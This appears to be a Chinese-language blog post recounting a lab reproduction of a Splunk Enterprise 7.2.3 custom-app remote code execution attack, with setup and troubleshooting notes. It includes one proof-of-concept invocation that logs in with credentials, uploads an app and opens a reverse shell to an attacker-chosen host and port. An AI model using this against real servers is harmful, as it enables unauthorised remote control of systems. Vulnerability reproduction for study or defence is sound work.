admin

Splunk Enterprise 7.2.3 Custom App RCE
环境搭建官网下载Sqlunk Splunk Enterprise 7.2.3 https://www.splunk...
扫描右侧二维码阅读全文
27
2019/01

Splunk Enterprise 7.2.3 Custom App RCE

环境搭建

官网下载Sqlunk Splunk Enterprise 7.2.3
https://www.splunk.com/en_us/download/splunk-enterprise.html
搭建参考:https://www.cnblogs.com/linux130/p/5571350.html

所需插件:https://github.com/mozilla/geckodriver/releases
选择相对应的平台

准备好之后就开始我们的复现踩坑之路

踩坑

根据给出的poc修改路径
-w1209

(1)运行splunk
-w800
(2)运行poc验证

poc.py <targetUrl> <username> <password> <lhost> <lport>

这里lhost lport为反弹shell的ip和端口
在运行poc时需要firefoxselenium为最新版本 不然会爆出错误

执行poc后 会自行模拟浏览器进入输入密码进入splunk后台

然后上传app并进行反弹shell

-w681

在shell反弹时需要耐心等待一会大概1-2分钟才会有回显

在kali下更新firefox参考:https://blog.csdn.net/henuyh/article/details/81350170

不同环境搭建出现的问题不同,多多搜索并解决出现的问题。

复现录屏

Last modification:January 27th, 2019 at 05:21 pm
If you think my article is useful to you, please feel free to appreciate

Leave a Comment